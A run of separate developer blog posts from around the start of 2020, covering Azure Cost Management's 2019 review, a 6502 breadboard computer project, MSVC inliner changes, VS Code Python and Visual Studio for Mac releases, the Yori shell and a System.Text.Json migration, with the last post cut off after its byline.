Azure Cost Management 2019 year in review


When we talk about cost management, we focus on three core tenets:

  1. Ensuring cost visibility so everyone is aware of the financial impact their solutions have.
  2. Driving accountability throughout the organization to stop bad spending patterns.
  3. Continuous cost optimization as your usage changes over time to do more with less.

These were the driving forces in 2019 as we set out to build a strong foundation that pulls together all costs across all account types and ensures everyone in the organization has a means to report on, control, and optimize costs. Our ultimate goal is to empower you to lead a healthier, more financially responsible organization.

All costs behind a single pane of glass

On the heels of the Azure Cost Management preview, 2019 started off strong with the general availability of Enterprise Agreement (EA) accounts in February and pay-as-you-go (PAYG) in April. At the same time, Microsoft as a whole embarked on a journey to modernize the entire commerce platform with the new Microsoft Customer Agreement (MCA), which started rolling out for enterprises in March, pay-as-you-go subscriptions in July, and Cloud Solution Providers (CSP) using Azure plan in November. Whether you get Azure through the Microsoft field, directly from Azure.com, or through a Microsoft partner, you have the power of Azure Cost Management at your fingertips. But getting basic coverage of your Azure usage is only part of the story.

To effectively manage costs, you need all costs together, in a single repository. This is exactly what Azure Cost Management brings you. From the unprecedented ability to monitor Amazon Web Services (AWS) costs within the Azure portal in May (a first for any cloud provider), to the inclusion of reservation and Marketplace purchases in June, Azure Cost Management enables you to manage all your costs from a single pane of glass, whether you're using Azure or AWS.

What's next?

Support for Sponsorship and CSP subscriptions not on an Azure plan is at the top of the list to ensure every Azure subscription can use Azure Cost Management. AWS support will become generally available and then Google Cloud Platform (GCP) support will be added.

Making it easier to report on and analyze costs

Getting all costs in one place is only the beginning. 2019 also saw many improvements that help you report on and analyze costs. You were able to dig in and explore costs with the 2018 preview, but the only way to truly control and optimize costs is to raise awareness of current spending patterns. To that end, reporting in 2019 was focused on making it easier to customize and share.

The year kicked off with the ability to pin customized views to the Azure portal dashboard in January. You could share links in May, save views directly from cost analysis in August, and download charts as an image in September. You also saw a major Power BI refresh in October that no longer required classic API keys and added reservation details and recommendations. Each option helps you not only save time, but also starts that journey of driving accountability by ensuring everyone is aware of the costs they're responsible for.

Looking beyond sharing, you also saw new capabilities like forecasting costs in June and switching between currencies in July, simpler out-of-the-box options like the new date picker in May and invoice details view in September, and changes that simply help you get your job done the way you want to like support for the Azure portal dark theme and continuous accessibility improvements throughout the year.

From an API automation and integration perspective, 2019 was also a critical milestone as EA cost and usage APIs moved to Azure Resource Manager. The Resource Manager APIs are forward-looking and designed to minimize your effort when it comes time to transition to Microsoft Customer Agreement by standardizing terminology across account types. If you haven't started the migration to the Resource Manager APIs, make that your number one resolution for the new year!

What's next?

2020 will continue down this path, from more flexible reporting and scheduling email notifications to general improvements around ease of use and increased visibility throughout the Azure portal. Power BI will get Azure reservation and Hybrid Benefit reports as well as support for subscription and resource group users who don't have access to the whole billing account. You can also expect to see continued API improvements to help make it easier than ever to integrate cost data into your business systems and processes.

Flexible cost control that puts the power in your hands

Once you understand what you're spending and where, your next step is to figure out how to stop the bad spending patterns and keep costs under control. You already know you can define budgets to get notified about and take action on overages. You decide what actions you want to take, whether that be as simple as an email notification or as drastic as deleting all your resources to ensure you won't be charged. Cost control in 2019 was centered on helping you stay on top of your costs and giving you the tools to control spending as you see fit.

This started with a new, consolidated alerts experience in February where you can see all your invoice, credit, and budget overage alerts in a single place. Budgets were expanded to support new account types we talked about above, and to support management groups in June giving you a view of all your costs across subscriptions. Then in August, you were able to create targeted budgets with filters for fine-grained tracking, whether that be for an entire service, a single resource, or an application that spans multiple subscriptions (via tags). This also came with an improved experience when creating budgets to help you better estimate what your budget should be based on historical and forecasted trends.

What's next?

2020 will take cost control to the next level by allowing you to split shared costs with cost allocation rules and define an additional markup for central teams who typically run on overhead or don't want to expose discounts to the organization. We're also looking at improvements around management groups and tags to give you more flexibility to manage costs the way you need to for your organization.

New ways to save and do more with less

Cloud computing comes with a lot of promises, from flexibility and speed to scalability and security. The promise of cost savings is often the driving force behind cloud migrations, yet it is also one of the more elusive to achieve. Luckily, Azure delivers new cost optimization opportunities nearly every month! This is on top of the recommendations offered by Azure Advisor, which are specifically tuned to save money on the resources you already have deployed. You saw over two dozen new cost saving opportunities in 2019 alone.

What's next?

Expect to see continued updates in these areas through 2020. We're also partnering with individual service teams to deliver even more built-in recommendations for database, storage, and PaaS services, just to name a few.

Streamlined account and subscription management

Throughout 2019, you may have noticed a lot of changes to Cost Management + Billing in the Azure portal. What was purely focused on PAYG subscriptions in early 2018 became a central hub for billing administrators in 2019 with full administration for MCA accounts in March, new EA account management capabilities in July, and subscription provisioning and transfer updates in August. All of these are helping you get one step closer to having a single portal to manage every aspect of your account.

What's next?

2020 will be the year of converged and consolidated experiences for Cost Management + Billing. This will start with the Billing and Cost Management experiences within the Azure portal and will expand to include capabilities you're currently using the EA, Account, or Cloudyn portals for today. Whichever portal you use, expect to see all these come together into a single, consolidated experience that has more consistency across account types. This will be especially evident as your account moves from the classic EA, PAYG, and CSP programs to Microsoft Customer Agreement (and Azure plan), which is fully managed within the Azure portal and offers critical new billing capabilities, like finer-grained access control and grouping subscriptions into separate invoices.

Looking forward to another year

The past 12 months have been packed with one improvement after another, and we're just getting started! We couldn't list them all here, but if you only take one thing away, please do check out and subscribe to the Azure Cost Management monthly updates for the latest news on what's changed and what's coming. We've already talked about what you can expect to see in 2020 for each area, but the key takeaway is:

2020 will bring one experience to manage all your Azure, AWS, and GCP costs from the Azure portal, with simpler, yet more powerful cost reporting, control, and optimization tools that help you stay more focused on your mission.

We look forward to hearing your feedback as these new and updated capabilities become available. And if you're interested in the latest features, before they're available to everyone, check out Azure Cost Management Labs (introduced in July) and don’t hesitate to reach out with any feedback. Cost Management Labs gives you a direct line to the Azure Cost Management engineering team and is the best way to influence and make an immediate impact on features being actively developed and tuned for you.

Follow @AzureCostMgmt on Twitter and subscribe to the YouTube channel for updates, tips, and tricks! And, as always, share your ideas and vote up others in the Cost Management feedback forum. See you in 2020!


The wires are crossed, literally! – Learning low level computing with Ben Eater’s 6502 kit


I've blogged about the importance of the LED Moment. You know, that moment when you get it to blink.

Ben Eater is a bit of an internet legend. His site at https://eater.net has a shop and YouTube videos where he's creating educational videos showing low-level (and somewhat historical) computing.

He's known for "building an 8-bit CPU from scratch."

This tutorial walks through building a fully programmable 8-bit computer from simple logic gates on breadboards.

Simple logic gates? Yep, like && and || and 7400 series chips and whatnot. I learned on these 25 years ago in college and I sucked at it. I think I ended up making A CLOCK. Ben makes A COMPUTER.

This Christmas my gift to myself was to learn to build a 6502 computer (that's the processor that powered the Apple ][, the NES, the C64, the BBC Micro and more - it's literally the processor of my entire childhood). Ben has made the videos available free on YouTube and the parts list can be sourced however you'd like, but I chose to get mine directly from Ben as he's done all the work of putting the chips and wires in a box. I got the 6502 Computer Kit, the Clock Module Kit, and an EEPROM Programmer. I also ordered a Quimat 2.4" TFT Digital Oscilloscope Kit which is AMAZING for the value. Later I ordered a Pokit Oscilloscope that will use my phone for the screen.

I'm about halfway through the videos. There are 4 videos of about 1 hour each, but I've been following along and pausing. Ben will wire something up and speed up the video, so each 1 hour video has taken me about 4-5 hours of actual time, as I'm cutting and stripping wires manually and trying to get my board to look and behave like Ben's in the video. More importantly, I made the promise to myself that I'd not continue if I didn't understand (mostly) what was happening AND I wouldn't continue if my board didn't actually work.

At the middle-end of Video 2, we're hooking up a newly flashed EEPROM that has our computer program on it. This isn't even at Assembly Language yet - we're writing the actual Hex Codes of the processor instructions into a 32768 byte long binary file and then flashing the result to an EEPROM and reseating it each time.

Madness! Flashing an EEPROM

I'd respectfully ask that you follow me on Instagram as I'm documenting my experience in photos.

A few days ago I was manually stepping (one clock pulse at a time) through some code and I kept getting "B2" - and by "getting" that value, I mean that quite literally there are 8 blue wires coming off the data line (8 pins) on an EEPROM and they are going to turn 8 LEDs on or off. I wanted to get the number "AA."

What. I'm getting B2, I want AA. I have no idea. Do I pull it apart and redo the whole board? How many hours ago did I make a mistake? 3? 7? I was sad and dejected.

And I stared.

But then I thought: why is AA such a lovely hex number? Because it's alternating 1s and 0s: 10101010.

I was getting B2, which is 10110010.

10101010   (AA, the value I wanted)
10110010   (B2, the value I was getting)

I had swapped two of the wires going from the EEPROM to the Processor. I was getting exactly what I asked for. I had swapped two wires/pins, so the bits were swapped.
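
If you like double-checking this sort of thing in software, here's a tiny sketch of my own (not from Ben's materials). The two bits that differ between AA and B2 are bits 3 and 4, which is exactly what crossing two adjacent data lines produces:

def swap_bits(value, i, j):
    # Swap bit positions i and j of a byte-sized value.
    if ((value >> i) & 1) != ((value >> j) & 1):
        value ^= (1 << i) | (1 << j)
    return value

print(hex(swap_bits(0xAA, 3, 4)))  # prints 0xb2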

I wasn't grokking it until I stopped, thought, and looked at it from multiple angles. What am I doing? What's my goal? What is physically happening here? What abstractions have I added? (Even voltage -> binary -> hex is three abstractions!)

It seems a small and stupid thing. Perhaps you, Dear Reader, immediately knew what I had done wrong and were shouting it at this blog post 3 paragraphs ago. Perhaps you've never spent 13 hours debugging a Carriage Return.

But I didn't understand. And then I did. And I swapped two wires and it worked, dammit. Here is a video of it working, in fact.

It felt very good. My jaw dropped.

I feel like NOW, today, I'm ready to go to college and fix my B in Electronics Class.

Youth is wasted on the young, my friends. What have YOU been learning lately?


Sponsor: Like C#? We do too! That’s why we've developed a fast, smart, cross-platform .NET IDE which gives you even more coding power. Clever code analysis, rich code completion, instant search and navigation, an advanced debugger... With JetBrains Rider, everything you need is at your fingertips. Code C# at the speed of thought on Linux, Mac, or Windows. Try JetBrains Rider today!



© 2019 Scott Hanselman. All rights reserved.
     

C++ Inliner Improvements: The Zipliner


Visual Studio 2019 versions 16.3 and 16.4 include improvements to the C++ inliner. Among these is the ability to inline some routines after they have been optimized, referred to as the “Zipliner.” Depending on your application, you may see some minor code quality improvements and/or major build-time (compiler throughput) improvements. 

C2 Inliner

Terry Mahaffey has provided an overview of Visual Studio’s inlining decisions. This details some of the inliner’s constraints and areas for improvement, a few of which are particularly relevant here: 

  1. The inliner is recursive and may often re-do work it has already done. Inline decisions are context sensitive and it is not always profitable to replay its decision-making for the same function. 
  2. The inliner is very budget conscious. It has the difficult job of balancing executable size with runtime performance. 
  3. The inliner’s view of the world is always “pre-optimized.” It has very limited knowledge of copy propagation and dead control paths for example.

Modern C++

Unfortunately, many of the coding patterns and idioms common to heavy generic programming bump into those constraints. Consider the following routine in the Eigen library:

Eigen::Matrix<float,-1,1,0,-1,1>::outerStride(void)

which calls innerSize:

template<typename Derived> class DenseBase 
... 
Index innerSize() const 
{ 
    return IsVectorAtCompileTime ? this->size() 
         : int(IsRowMajor) ? this->cols() : this->rows(); 
}

That instantiation of outerStride does nothing but return one of its members. Therefore, it is an excellent candidate for full inline expansion. To realize this win, though, the compiler must fully evaluate and expand outerStride’s 18 total callees, for every callsite of outerStride in the module. This eats into both optimizer throughput and the inliner’s code-size budget. It also bears mentioning that calls to ‘rows’ and ‘cols’ are inline-expanded as well, even though those are on a statically dead path.

It would be much better if the optimizer just inlined the two-line member return:

?outerStride@?$Matrix@N$0?0$0?0$0A@$0?0$0?0@Eigen@@QEBA_JXZ PROC ; Eigen::Matrix<double,-1,-1,0,-1,-1>::outerStride, COMDAT
    mov rax, QWORD PTR [rcx+8]
    ret 0

Inlining Optimized IR

For a subset of routines the inliner will now expand the already-optimized IR of a routine, bypassing the process of fetching IR, and re-expanding callees. This has the dual purpose of expanding callsites much faster, as well as letting the inliner measure its budget more accurately. 

First, the optimizer will summarize that outerStride is a candidate for this faster expansion when it is originally compiled (Remember that c2.dll tries to compile routines before their callers). Then, the inliner may replace calls to that outerStride instantiation with the field access. 

The candidates for this faster inline expansion are leaf functions with no locals, which refer to at most two different arguments, globals, or constants. In practice this targets most simple getters and setters.
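
As a rough illustration (my own sketch, not code from the compiler team), this is the shape of routine that qualifies: a leaf getter with no locals that reads a single member, so its optimized IR is just one load.

struct Stride
{
    long inner;
    long outer;

    // Leaf function, no locals, reads a single member: once optimized it is
    // one load, so the inliner can expand the optimized IR directly.
    long outerStride() const { return outer; }
};

long useStride(const Stride& s)
{
    return s.outerStride(); // becomes a single field load at the call site
}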

Benefits

There are many examples like outerStride in the Eigen library where a large call tree expands into just one or two instructions. Modules that make heavy use of Eigen may see a significant throughput improvement; we measured the optimizer taking up to 25-50% less time for such repros. 

The new Zipliner will also enable the inliner to measure its budget more accurately. Eigen developers have long been aware that MSVC does not inline to their specifications (see EIGEN_STRONG_INLINE). Zipliner should help to alleviate some of this concern, as a ziplined routine is now considered a virtually “free” inline.

Give the feature a try

This is enabled by default in Visual Studio 2019 16.3, along with some improvements in 16.4. Please download Visual Studio 2019 and give the new improvements a try. We can be reached via the comments below or via email (visualcpp@microsoft.com). If you encounter problems with Visual Studio or MSVC, or have a suggestion for us, please let us know through Help > Send Feedback > Report A Problem / Provide a Suggestion in the product, or via Developer Community. You can also find us on Twitter (@VisualC).

The post C++ Inliner Improvements: The Zipliner appeared first on C++ Team Blog.

Python in Visual Studio Code – January 2020 Release


We are pleased to announce that the January 2020 release of the Python Extension for Visual Studio Code is now available. You can download the Python extension from the Marketplace, or install it directly from the extension gallery in Visual Studio Code. If you already have the Python extension installed, you can also get the latest update by restarting Visual Studio Code. You can learn more about  Python support in Visual Studio Code in the documentation.  

In this release we addressed 59 issues, including: 

  • Kernel selection in Jupyter Notebooks  
  • Performance improvements in the Jupyter Notebook editor
  • Auto-activation of environments in the terminal on load (thanks Igor Aleksanov!) 
  • Fixes to rebuilding ctags on save and on start 

If you’re interested, you can check the full list of improvements in our changelog.

Kernel selection in Jupyter Notebooks 

Showcasing kernel selection in the VS Code Notebook Editor

In the top right of the Notebook Editor and the Interactive Window, you will now be able to see the current kernel that the notebook is using, along with the kernel status (i.e. whether it is idle, busy, etc.). This release also allows you to change your kernel to other Python kernels. To change your current active kernel, click on the current kernel to bring up the VS Code kernel selector and select which kernel you want to switch to from the list.

Performance improvements in the Jupyter Notebook editor! 

This release includes many improvements to the performance of Jupyter in VS Code in both the Notebook editor and the Interactive Window. This was accomplished through caching previous kernels and through optimizing the search for Jupyter. Some of the significant improvements due to these changes are: 

  • Initial starting of the Jupyter server is faster, and subsequent starts of the Jupyter server are more than 2X faster  
  • Creating a blank new Jupyter notebook is 2X faster 
  • Opening Jupyter Notebooks (especially with a large file size) is now 2x faster 

Note: these performance calculations were measured in our testing, your improvements may vary. 

Auto-activation of environments in the terminal on load 

When you have a virtual or conda environment selected in your workspace and you create a new terminal, the Python extension activates the selected environment in that new terminal. Now, this release adds the option of having the selected environment automatically activated in an already-open terminal as soon as the Python extension loads.

Environment activated in VS Code terminal when Python extension loads

To enable this feature, you can add the setting "python.terminal.activateEnvInCurrentTerminal": true to your settings.json file. Then, when the extension loads and there's a terminal open in VS Code, the selected environment will be automatically activated.
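
For example, the relevant settings.json entry (a minimal sketch using just the setting named above) looks like this:

{
    "python.terminal.activateEnvInCurrentTerminal": true
}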

Fixes to rebuilding ctags on save and on start 

The ctags tool is responsible for generating workspace symbols for the user. As a result, the document outline becomes populated with file symbols, allowing you to easily find these symbols (such as functions) within your workspace.  

This release includes a fix for the most upvoted bug report on our GitHub repo (GH793), related to ctags. Now, tags stored in the .vscode folder for your project can be rebuilt when the Python extension loads by setting “python.workspaceSymbols.rebuildOnStart” to true, or rebuilt on every file save by setting “python.workspaceSymbols.rebuildOnFileSave” to true. 

Tags file rebuilt on save and when Python extension loads
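
Both options live in settings.json as well; a sketch with both enabled:

{
    "python.workspaceSymbols.rebuildOnStart": true,
    "python.workspaceSymbols.rebuildOnFileSave": true
}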

You can learn more about ctags support in our documentation. 

Other Changes and Enhancements 

We have also added small enhancements and fixed issues requested by users that should improve your experience working with Python in Visual Studio Code. Some notable changes include: 

  • Support the ability to take input from users inside of a notebook or the Interactive Window. (#8601) 
  • Support local images in markdown and output for notebooks. (#7704) 
  • Support saving plotly graphs in the Interactive Window or inside of a notebook. (#7221) 
  • Use “conda run” when executing Python and an Anaconda environment is selected. (#7696) 
  • Activate conda environment using path when name is not available. (#3834) 
  • Add QuickPick dropdown option to Run All/Debug All  parametrized tests. (thanks to Philipp Loose) (#5608)

We’re constantly A/B testing new features. If you see something different that was not announced by the team, you may be part of an experiment! To see if you are part of an experiment, you can check the first lines in the Python extension output channel. If you wish to opt out of A/B testing, you can open the user settings.json file (View > Command Palette… and run Preferences: Open Settings (JSON)) and set the “python.experiments.enabled” setting to false.

Be sure to download the Python extension for Visual Studio Code now to try out the above improvements. If you run into any problems, please file an issue on the Python VS Code GitHub page. 

 

 

The post Python in Visual Studio Code – January 2020 Release appeared first on Python.

Visual Studio 2019 for Mac version 8.4 is now available


The Visual Studio for Mac team is kicking off the new year with our best release ever! Visual Studio 2019 for Mac version 8.4, released today, brings several exciting enhancements to the developer experience. Many of these items were top requests from our community and are covered in the sections below.

To learn more about all of the changes in this release of Visual Studio for Mac, see our release notes.

Be up to date with .NET Core 3.1

This release of Visual Studio for Mac adds full support for .NET Core 3.1. You’ll be able to create .NET Core 3.1 applications and take them from building and debugging through publishing. .NET Core 3.1 is a long-term supported (LTS) release, meaning it will continue to be supported for three years.

For more details on the full set of changes introduced by .NET Core 3.1, see the release notes.

Develop faster with ASP.NET Core Scaffolding

Our community has suggested we add ASP.NET Core Scaffolding to Visual Studio for Mac. We listened and brought Scaffolding for ASP.NET Core projects to Visual Studio for Mac version 8.4. Scaffolding speeds up and simplifies ASP.NET Core app development by generating boilerplate code for common scenarios.

Click on the New Scaffolding… entry in the Add flyout of the project context menu to access the Scaffolding feature for your ASP.NET Core projects in Visual Studio for Mac. The node on which you opened the right-click context menu will be the location where the generated files will be placed.

A scaffolding wizard will pop up to assist in generating code into your project. I’m using one of our ASP.NET Core sample projects – a movie database app – to demonstrate scaffolding in action. I’ve used the new feature to create pages for Create, Read, Update, and Delete operations (CRUD) and a Details page for the movie model.

Scaffolding wizard for ASP.NET Core project in Visual Studio for Mac

Once the wizard closes, it will add the required NuGet packages to your project and create additional pages, based on the scaffolder you chose.

You can also take a look at our documentation for more information on Scaffolding ASP.NET Core projects.

Build and publish ASP.NET Core Blazor Server applications

In addition to ASP.NET Core Scaffolding, we’ve also added support for developing and publishing ASP.NET Core Blazor Server applications based on feedback from our users. Blazor is a framework for building interactive client-side web UI using .NET and brings with it several advantages including the ability to:

  • Write interactive web UIs using C# instead of JavaScript
  • Leverage the existing .NET ecosystem of .NET libraries
  • Share app logic across server and client
  • Benefit from .NET’s performance, reliability, and security
  • Build on a common set of easy-to-use, stable, feature-rich languages, frameworks, and tools

Blazor uses open web standards and requires no additional plugins or code transpilation meaning that anything you develop using it will work in all modern web browsers on the desktop or on mobile. If you’re interested in learning more about Blazor, check out the Blazor webpage.

With Visual Studio 2019 for Mac 8.4, you can create new Blazor Server projects complete with the ability to build, run, and debug. When creating a New Project, you’ll now find the Blazor Server App project template.

Visual Studio for Mac New Project Dialog with Blazor Server App template selected

When working with Blazor applications, you’ll be working with .razor files. Visual Studio 2019 for Mac version 8.4 brings full support for colorization and completions when working with these files in the editor.

You can publish your Blazor applications directly to Azure App Service using Visual Studio for Mac. Get started with a free Azure account if you don’t already have one by signing up here. You’ll get access to a number of popular services, and over 25 always free services with your account.

Be more productive with editor improvements

Visual Studio for Mac now supports full colorization, completion, and IntelliSense for .razor files. We’ve continued to work on adding features that were suggested to us by our users. This feedback has caused us to bring back preview boxes for code changes that may occur from a code fix or analysis suggestion. Colorization has also been tweaked to be more consistent with the Windows Visual Studio 2019 experience.

Work in the IDE using assistive technologies

We know it’s important to support various assistive technologies in order to ensure Visual Studio for Mac can be used by all. Ensuring the developer experience is accessible to anyone is extremely important to us and we’re committed to empowering everyone to develop on the Mac. You’ll find the following improvements and more available in Visual Studio for Mac 8.4:

  • Better focus order when navigating using assistive technologies
  • Higher color contrast ratios for text and icons
  • Reduction of keyboard traps hindering IDE navigation
  • More accurate VoiceOver dictation and navigation
  • Completely rewritten IDE components to make them accessible
  • Expanded VoiceOver coverage for alert text

While we’ve made rapid progress improving accessibility of the entire IDE over the last few months, we know there’s still a lot more we can do to improve to ensure Visual Studio for Mac can delight everyone. Accessibility will continue to be a top priority for our team. We welcome your feedback to assist us in guiding this work. As the PM leading the accessibility effort, I invite you to reach out to me directly via dominicn@microsoft.com if you’d be willing to share your expertise or if you’d like to speak with me in more detail about our work so far.

Distribute .NET Core library projects with NuGet Pack support

Interested in distributing .NET Core class libraries you’ve created to a broader audience? We’ve made it easy for developers to create a NuGet package from a .NET Core library project in Visual Studio for Mac by right-clicking a project then selecting Pack.

Creating a NuGet package using Pack in Visual Studio for Mac

Once you’ve selected the Pack menu option for your library project, a NuGet package (.nupkg) file will be generated in the output folder.

Update to Visual Studio 2019 for Mac version 8.4 today!

In this post, you learned about all the new improvements in the Visual Studio for Mac experience. Now it’s time to download the release or update to the latest version on the Stable channel and give these new features and enhancements a try!

If you have any feedback you’d like to share on this version of Visual Studio for Mac, we invite you to reach out to us on Twitter at @VisualStudioMac. If you run into any issues, you can use Report a Problem to provide us with details and notify the team. In addition to issues, we welcome feature suggestions on the Visual Studio Developer Community website.

Happy coding and a happy new year from all of us on the Visual Studio for Mac team!

The post Visual Studio 2019 for Mac version 8.4 is now available appeared first on Visual Studio Blog.



Yori – The quiet little CMD replacement that you need to install NOW


I did a post on the difference between a console, a terminal, and a shell a while back. We talk a lot about alternative "Terminals" like the Windows Terminal (that you should download immediately) but not shells. You do see a lot of choices in the Linux space, with the top five being Bash, Zsh, Fish, Tcsh, and Ksh, but not a lot about alternative shells for Windows. Did you love 4DOS? Well, READ ON. (Yes I know TCC is a thing, but Yori is a different thing)

So let's talk about a quiet little CMD replacement shell that is quietly taking over my life. You should check it out and spend some time with it. It's called Yori and it's open source and it's entirely written by one Malcolm Smith. It deserves your attention and respect because Yori has quickly become my goto "DOS but not DOS" prompt.

Yori is DOS, kinda

Of course, cmd.exe isn't DOS but it's evocative of DOS and it's "Close enough to be DOS." It'll run .cmd files and batch files. If dir, and del *.*, and rd /s feels more intuitive to you than bash shell commands, Yori will fit into your life nicely.

I use PowerShell a lot as a shell and I use Bash via WSL and Ubuntu, but since I started on CMD (or command.com, even) Yori feels very comfortable because it's literally "CMD reimagined." Yori offers a number of cmd++ enhancements like:

  • Autocomplete suggestions as you type
  • Ctrl+to select Values
  • WAY better Tab completion
  • Awesome file matching
  • Beyond MAX_PATH support for "DOS"
  • Rich Text Copy!
  • Backquote support
  • Background Jobs like Unix but for DOS. So you can use & like a real person!
  • Alias! My goodness!
  • which (like where, but it's which!) command
  • hexdump, lines, touch, and more great added tools
  • lots of "y" utils like ydate and ymem and ymore.
  • New Environment variables make your batch files shine
  • ANSI colors/UTF-8 support!

Download Yori, make a link, pin it, or add it to your Windows Terminal of choice (see below), and then explore the extensive Guide To Yori.

Did I mention & jobs support! How often have you done a copy or xcopy and wanted to &! it and then check it later with job? Now you can!

C:\Users\Scott\Desktop>dir &!

Job 2: c:\Program Files\Yori\ydir.exe
C:\Users\Scott\Desktop>job
Job 1 (completed): c:\Program Files\Yori\ydir.exe
Job 2 (executing): c:\Program Files\Yori\ydir.exe
Job 2 completed, result 0: c:\Program Files\Yori\ydir.exe

Yori also supports updating itself with "ypm -u" which is clever. Other lovely Yori-isms that will make you smile?

  • cd ~ - it works
  • cd ~desktop - does what you think it'd do
  • Win32 versions of UNIX favorites including cut, date, expr, fg, iconv, nice, sleep, split, tail, tee, wait and which
  • dir | clip - supports HTML as well!
  • durable command history

And don't minimize the amount of work that's happened here. It's a LOT. And it's a great balance between compatibility and breaking compatibility to bring the best of the old and the best of the new into a bright future.

Other must-have Malcolm Smith Tools

Now that I've "sold" you Yori (it's free!) be sure to pick up sdir (so good, a gorgeous dir replacement) and other lovely tools that Malcolm has written and put them ALL in your c:\utils folder (you have one, right? Make one! Put it in DropBox/OneDrive! Then add it to your PATH on every machine you have!) and enjoy!

Yori is lovely, paired with SDIR

Adding Yori to the Windows Terminal

Yori includes its own improved Yori-specific terminal (to go with the Yori shell) but it also works with your favorite terminal.

If you are using the Windows Terminal, head over to your settings file (from the main Windows Terminal menu) and add something like this for a Yori menu. You don't need all of this, just the basics like commandline. I added my own colorScheme and tabTitle. You can salt your own to taste.

{

"acrylicOpacity": 0.85000002384185791,
"closeOnExit": true,
"colorScheme": "Lovelace",
"commandline": "c://Program Files//Yori//yori.exe",
"cursorColor": "#00FF00",
"cursorHeight": 25,
"cursorShape": "vintage",
"fontFace": "Cascadia Code",
"fontSize": 20,
"guid": "{7d04ce37-c00f-43ac-ba47-992cb1393215}",
"historySize": 9001,
"icon": "ms-appdata:///roaming/cmd-32.png",
"name": "DOS but not DOS",
"padding": "0, 0, 0, 0",
"snapOnInput": true,
"startingDirectory": "C:/Users/Scott/Desktop",
"tabTitle": "DOS, Kinda",
"useAcrylic": true
},

Great stuff!

I want YOU, Dear Reader, to head over to https://github.com/malxau/yori right now and give Yori and Malcolm a STAR. He's got 110 as of the time of this posting. Let's make that thousands. There's so many amazing folks out there quietly writing utilities for themselves, tirelessly, and a star is a small thing you can do to let them know "I see you and I appreciate you."


Sponsor: Curious about the state of software security as we head into 2020? Check out Veracode’s 2019 SOSS X report to learn common vulnerability types, how to improve fix rates, and crucial industry data.



© 2019 Scott Hanselman. All rights reserved.
     

Updating my ASP.NET podcast site to System.Text.Json from Newtonsoft.Json


Now that .NET Core 3.1 is LTS (Long Term Support) and will be supported for 3 years, it's the right time for me to update all my .NET Core 2.x sites to 3.1. It hasn't taken long at all and the peace of mind is worth it. It's nice to get all these sites (in the Hanselman ecosystem LOL) onto the .NET Core 3.1 mainline.

While most of my sites were working and running just fine - the upgrade was easy - there was an opportunity with the podcast site to move off the venerable Newtonsoft.Json library and move (upgrade?) to System.Text.Json. It's blessed by (and worked on by) James Newton-King so I don't feel bad. It's only a good thing. Json.NET has a lot of history and existed before .NET Standard, Span<T>, and existed in a world where .NET thought more about XML than JSON.

Now that JSON is essential, it was time that JSON be built into .NET itself, and System.Text.Json also allows ASP.NET Core to exist without any compatibility issues given its historical dependency on Json.NET. (Although for back-compat reasons you can add Json.NET back with one line using AddNewtonsoftJson if you like.)
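
If you do need Json.NET's behavior back in an ASP.NET Core 3.x app, that one-line opt-in looks roughly like this inside Startup.ConfigureServices (assuming the Microsoft.AspNetCore.Mvc.NewtonsoftJson package is referenced):

public void ConfigureServices(IServiceCollection services)
{
    // Swap MVC's serializer back from System.Text.Json to Json.NET
    services.AddControllersWithViews()
        .AddNewtonsoftJson();
}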

Everyone's usage of JSON is different so your mileage will depend on how much of Json.NET you used, how much custom code you wrote, and how deep your solution goes. My podcast site uses it to access a number of JSON files I have stored in Azure Storage, as well as to access 3rd party RESTful APIs that return JSON. My podcast site's "in memory database" is effectively a de-serialized JSON file.

I start by bringing in two namespaces, and removing Json.NET's reference and seeing if it compiles! Just rip that Band-Aid off fast and see if it hurts.

using System.Text.Json;

using System.Text.Json.Serialization;

I use Json Serialization in Newtonsoft.Json and have talked before about how much I like C# Type Aliases. Since I used J as an alias for all my Attributes, that made this code easy to convert, and easy to read. Fortunately things like JsonIgnore didn't have their names changed so the namespace was all that was needed there.

NOTE: The commented out part in these snippets is the Newtonsoft bit so you can see Before and After

//using J = Newtonsoft.Json.JsonPropertyAttribute;

using J = System.Text.Json.Serialization.JsonPropertyNameAttribute;

/* SNIP */

public partial class Sponsor
{
[J("id")]
public int Id { get; set; }

[J("name")]
public string Name { get; set; }

[J("url")]
public Uri Url { get; set; }

[J("image")]
public Uri Image { get; set; }
}

I was using Newtonsoft's JsonConvert, so I changed that DeserializeObject call like this:

//public static v2ShowsAPIResult FromJson(string json) => JsonConvert.DeserializeObject<v2ShowsAPIResult>(json, Converter.Settings);

public static v2ShowsAPIResult FromJson(string json) => JsonSerializer.Deserialize<v2ShowsAPIResult>(json);

In other classes some of the changes weren't stylistically the way I'd like them (as an SDK designer) but these things are all arguable either way.

For example, ReadAsAsync<T> is a super useful extension method that has hung off of HttpContent for many years, and it's gone in .NET 3.x. It was an extension that came along for the ride inside Microsoft.AspNet.WebApi.Client, but it would bring Newtonsoft.Json back along with it.

In short, this Before becomes this After which isn't super pretty.

return await JsonSerializer.DeserializeAsync<List<Sponsor>>(await res.Content.ReadAsStreamAsync());

//return await res.Content.ReadAsAsync<List<Sponsor>>();

But one way to fix this (if this kind of use of ReadAsAsync is spread all over your app) is to make your own extension class:

public static class HttpContentExtensions

{
public static async Task<T> ReadAsAsync<T>(this HttpContent content) =>
await JsonSerializer.DeserializeAsync<T>(await content.ReadAsStreamAsync());
}
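
With that extension in scope, the earlier call site can keep its original shape:

return await res.Content.ReadAsAsync<List<Sponsor>>();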

My calls to JsonConvert.Serialize turned into JsonSerializer.Serialize:

//public static string ToJson(this List<Sponsor> self) => JsonConvert.SerializeObject(self);

public static string ToJson(this List<Sponsor> self) => JsonSerializer.Serialize(self);

And the reverse of course with JsonSerializer.Deserialize:

//public static Dictionary<string, Shows2Sponsor> FromJson(string json) => JsonConvert.DeserializeObject<Dictionary<string, Shows2Sponsor>>(json);

public static Dictionary<string, Shows2Sponsor> FromJson(string json) => JsonSerializer.Deserialize<Dictionary<string, Shows2Sponsor>>(json);

All in all, far easier than I thought. How have YOU found System.Text.Json to work in your apps?


Sponsor: When DevOps teams focus on fixing new flaws first, they can add to mounting security debt. Veracode’s 2019 SOSS X report spotlights how developers can reduce fix rate times by 72% with frequent scans.


© 2019 Scott Hanselman. All rights reserved.
     

Improvements to Accuracy and Performance of Linux IntelliSense

$
0
0

This blog post was written by Paul Maybee, a Principal Software Engineer on the C++ Cross-Platform Team. 

